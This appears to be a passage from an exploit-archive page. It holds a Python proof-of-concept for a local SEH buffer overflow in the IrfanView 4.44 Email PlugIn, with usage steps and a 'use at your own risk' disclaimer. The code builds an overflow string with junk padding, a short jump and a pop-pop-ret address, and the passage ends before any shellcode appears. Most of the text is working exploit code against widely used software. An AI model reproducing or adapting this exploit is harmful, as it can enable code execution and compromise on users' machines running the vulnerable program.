Exploits / Vulnerability Discovered : 2018-03-02 |
Type : local |
Platform : windows
This exploit / vulnerability Irfanview 4.44 email plugin buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.44 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.44
# Software Link: http://www.irfanview.info/files/irfanview_444.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_444.zip
# Tested On: Windows XP SP3 x86 and Windows 7 SP1 x86
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
#
filename="irfan.txt"
junk = "\x41"*1236
#jump 6
nseh = "\xeb\x06\x90\x90"
#0x10021420 : pop ebp # pop ebx # ret
seh = "\x20\x14\x02\x10"